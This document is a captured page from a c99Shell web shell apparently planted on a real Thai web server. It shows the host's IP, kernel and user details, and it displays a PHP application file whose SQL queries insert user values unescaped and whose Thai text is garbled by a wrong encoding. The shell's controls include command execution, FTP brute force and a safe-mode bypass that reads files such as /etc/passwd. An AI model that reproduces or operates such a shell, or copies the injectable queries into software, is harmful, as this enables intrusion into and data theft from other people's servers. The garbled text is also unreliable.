110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/directorBCNU/ drwxr-xr-x Free 52.6 GB of 127.8 GB (41.16%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/ drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: Add7131.php (30.43 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

"; echo "

ЎГШіТ·УЎТГ Login ЎиН№

"; echo ""; exit(); } else { /** Configuration */ require_once( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "../includes/Function.php" ); require_once( "../includes/FunctionDB.php" ); /** Create Database Object */ $dbObj = new DBConn; //=== SESSION $Username = $valid_user; /** Config Table for This Page */ $myTable1 = "personal_tb"; $myTable2 = "formaoffice"; $myTable3 = "project_tb"; $myTable4 = "training_tb"; $myTable5 = "budget_year_tb"; $query = "SELECT * FROM personal_tb LEFT JOIN district ON personal_tb.districtId = district.districtId LEFT JOIN amphur ON personal_tb.amphurId = amphur.amphurId LEFT JOIN province ON personal_tb.provinceId = province.provinceId WHERE Username='$Username' "; $result = $dbObj->execQuery($query); $rs = $dbObj->fetchArray($result); $Teacher_code = $rs['Teacher_code']; /** Table --> personal_tb */ $query = " SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE Teacher_code='$Teacher_code' "; $result = $dbObj->execQuery($query); $rss = $dbObj->fetchArray($result); $Teacher_code = $rss['Teacher_code']; $query11 = " SELECT * FROM personal_tb LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId WHERE Teacher_code='$Teacher_code' "; $result11 = $dbObj->execQuery($query11); $rss11 = $dbObj->fetchArray($result11); /** Table --> tech_plan_tb */ $query1 = " SELECT * FROM $myTable2 WHERE codeId='$codeId' "; $result1 = $dbObj->execQuery($query1); $rs1 = $dbObj->fetchArray($result1); /** Table --> techplan_method_tb */ $query2 = " SELECT * FROM $myTable3 WHERE codeId='$codeId' "; $result2 = $dbObj->execQuery($query2); $rs2 = $dbObj->fetchArray($result2); /** Table --> tech_spec_tb */ $query3 = " SELECT * FROM $myTable4 WHERE Training_code='$Training_code' AND Teacher_code='$Teacher_code' "; $result3 = $dbObj->execQuery($query3); $rs3 = $dbObj->fetchArray($result3); $query = " SELECT * FROM $myTable5 "; $result5 = $dbObj->execQuery($query); $rs5 = $dbObj->fetchArray($result5); $query6 = " SELECT * FROM prefix"; $result6 = $dbObj->execQuery($query6); $query7 = " SELECT * FROM people_tb WHERE Teacher_code = '$Teacher_code' "; $result7 = $dbObj->execQuery($query7); $rs7 = $dbObj->fetchArray($result7); } # else ?> <?=$_Config_sitename;?>

">Л№йТЛЕСЎ

бєєїНГмБГТЄЎТГ

ўйНБЩЕЎТГаєФЎ¤иТГСЎЙТѕВТєТЕ

єС№·ЦЎаєФЎа§Ф№КЗСКґФЎТГаЎХиВЗЎСєЎТГГСЎЙТѕВТєТЕ

бєє 7131

гєаєФЎа§Ф№КЗСКґФЎТГаЎХиВЗЎСєЎТГГСЎЙТѕВТєТЕ

в»Гґ·Уа¤ГЧиН§ЛБТВ / Е§г№ЄиН§ ѓ ѕГйНБ·Сй§ЎГНЎўйН¤ЗТБа·иТ·ХиЁУа»з№

с.

ўйТѕаЁйТ µУбЛ№и§ " readonly="readonly"/>

КС§ЎСґ "/>

т.

ўНаєФЎ¤иТГСЎЙТѕВТєТЕўН§

µ№аН§

¤ЩиКБГК

ЄЧиН аЕў»ГРЁУµСЗєСµГ»ГРЄТЄ№

єФґТ

ЄЧиН аЕў»ГРЁУµСЗєСµГ»ГРЄТЄ№

БТГґТ

ЄЧиН аЕў»ГРЁУµСЗєСµГ»ГРЄТЄ№

єШµГ

ЄЧиН аЕў»ГРЁУµСЗєСµГ»ГРЄТЄ№

аЎФґаБЧиН

а»з№єШµГЕУґСє·Хи

єШµГ

ЄЧиН аЕў»ГРЁУµСЗєСµГ»ГРЄТЄ№

аЎФґаБЧиН

а»з№єШµГЕУґСє·Хи

єШµГ

ЄЧиН аЕў»ГРЁУµСЗєСµГ»ГРЄТЄ№

аЎФґаБЧиН

а»з№єШµГЕУґСє·Хи

ВС§дБиєГГЕШ№ФµАТЗР а»з№єШµГдГй¤ЗТБКТБТГ¶ ЛГЧНаКБЧН№дГй¤ЗТБКТБТГ¶ (Ў)

»иЗВа»з№вГ¤

бЕРдґйаўйТГСєЎТГµГЗЁГСЎЙТѕВТєТЕ (ЄЧиНК¶Т№ѕВТєТЕ)

«Ци§а»з№К¶Т№ѕВТєТЕ ·Т§ГТЄЎТГ аНЎЄ№

µСй§бµи ЗС№·Хи

¶Ц§ЗС№·Хи

а»з№а§Ф№ГЗБ·Сй§КФй№ єТ· µСЗНСЎЙГ ( ) (ў)

µТБгєаКГзЁ·Хиб№є ЁУ№З№ ©єСє

у.

ўйТѕаЁйТБХКФ·ёФдґйГСєа§Ф№¤иТГСЎЙТѕВТєТЕ µТБѕГРГТЄЎДЙ®ХЎТа§Ф№КЗСКґФЎТГаЎХиВЗЎСєЎТГГСЎЙТѕВТєТЕ

µТБКФ·ёФ	а©ѕТРКиЗ№·ХиўТґНВЩиЁТЎКФ·ёФ·ХидґйГСєЁТЎЛ№иЗВ§Т№НЧи№
	а©ѕТРКиЗ№·ХиўТґНВЩиЁТЎКСТ»ГРЎС№АСВ
а»з№а§Ф№ µСЗНСЎЙГ( )

(1) ўйТѕаЁйТ	дБиБХКФ·ёФдґйГСє¤иТГСЎЙТѕВТєТЕЁТЎЛ№иЗВ§Т№НЧи№
	БХКФ·ёФдґйГСє¤иТГСЎЙТѕВТєТЕЁТЎЛ№иЗВ§Т№НЧи№бµиаЕЧНЎгЄйКФ·ёФЁТЎ·Т§ГТЄЎТГ
	БХКФ·ёФдґйГСє¤иТГСЎЙТѕВТєТЕµТБКСТ»ГРЎС№АСВ
	а»з№јЩйгЄйКФ·ёФаєФЎ¤иТГСЎЙТѕВТєТЕКУЛГСєєШµГбµиаѕХВ§ЅиТВаґХВЗ
(2)......ўйТѕаЁйТ	дБиБХКФ·ёФдґйГСє¤иТГСЎЙТѕВТєТЕЁТЛ№иЗВ§Т№НЧи№
(¤)	БХКФ·ёФдґйГСє¤иТГСЎЙТѕВТєТЕЁТЛ№иЗВ§Т№НЧи№ бµи¤иТГСЎЙТѕВТєТЕ·ХидґйГСєµиУЎЗиТКФ·ёФµТБѕГРГТЄЎДЙ®ХЎТП
	а©ѕТРКиЗ№·ХиўТґНВЩиЁТЎКСТ»ГРЎС№АСВ
	БХКФ·ёФдґйГСє¤иТГСЎЙТѕВТєТЕЁТЎЛ№иЗВ§Т№НЧи№г№°Т№Ра»з№јЩйНТИСВКФ·ёФўН§јЩйНЧи№

ф.

аК№Н " size="50" /> (§)

ўйТѕаЁйТўНГСєГН§ЗиТ ўйТѕаЁйТБХКФ·ёФаєФЎ¤иТГСЎЙТѕВТєТЕКУЛГСєµ№аН§бЕРєШ¤¤Ег№¤ГНє¤ГСЗ

µТБЁУ№З№·ХиўНаєФЎ «Ци§ЎУЛ№ґдЗйг№Ў®ЛБТВ бЕРўйН¤ЗТБўйТ§µй№а»з№ЁГФ§·ШЎ»ГРЎТГ

(Е§ЄЧиН) јЩйўНГСєа§Ф№КЗСКґФЎТГ

( )

ЗС№·Хи.......аґЧН№.............. ѕ.И.........

х.

¤УН№ШБСµФ

Н№ШБСµФгЛйаєФЎдґй

(Е§ЄЧиН)

( )

µУбЛ№и§

ц.

гєГСєа§Ф№

дґйГСєа§Ф№КЗСКґФЎТГаЎХиВЗЎСєЎТГГСЎЙТѕВТєТЕ ЁУ№З№а§Ф№ єТ·

µСЗНСЎЙГ ( ) дЗй¶ЩЎµйН§бЕйЗ

(Е§ЄЧиН) јЩйГСєа§Ф№

( )

(Е§ЄЧиН) јЩйЁиТВа§Ф№

( )

ЗС№·Хи.........аґЧН№.............. ѕ.И...........

¤УЄХйбЁ§

(Ў) гЛйГРєШЎТГБХКФ·ёФаѕХВ§гґ аБЧиНа·ХВєа·иТЎСєКФ·ёФ·ХидґйГСєµТБѕГРГТЄ®ХЎТа§Ф№КЗСКґФЎТГаЎХиВЗЎСєЎТГИЦЎЙТўН§єШµГ

(ў) гЛйБХ¤УЄХйбЁ§ґйЗВЗиТБХКФ·ёФаѕХВ§гґ бЕРўТґНВЩиа·иТгґЎГіХдґйГСєЁТЎЛ№иЗВ§Т№НЧи№аБЧиНа·ХВєКФ·ёФ

µТБѕГРГТЄЎДЙ®ХЎТа§Ф№КЗСКґФЎТГаЎХиВЗЎСєЎТГГСЎЙТѕВТєТЕ ЛГЧНўТґНВЩиа·иТгґаБЧиНдґйГСє¤иТГСЎЙТѕВТєТЕµТБКСТ»ГРЎС№АСВ

(¤) гЛйаµФБ¤УЗиТ ¤ЩиКБГК єФґТ БТГґТ ЛГЧНєШµГ бЕйЗбµиЎГіХ

(§ ) гЛйаК№НµиНјЩйБХНУ№ТЁН№ШБСµФ

freeresult($result1); /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); ?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--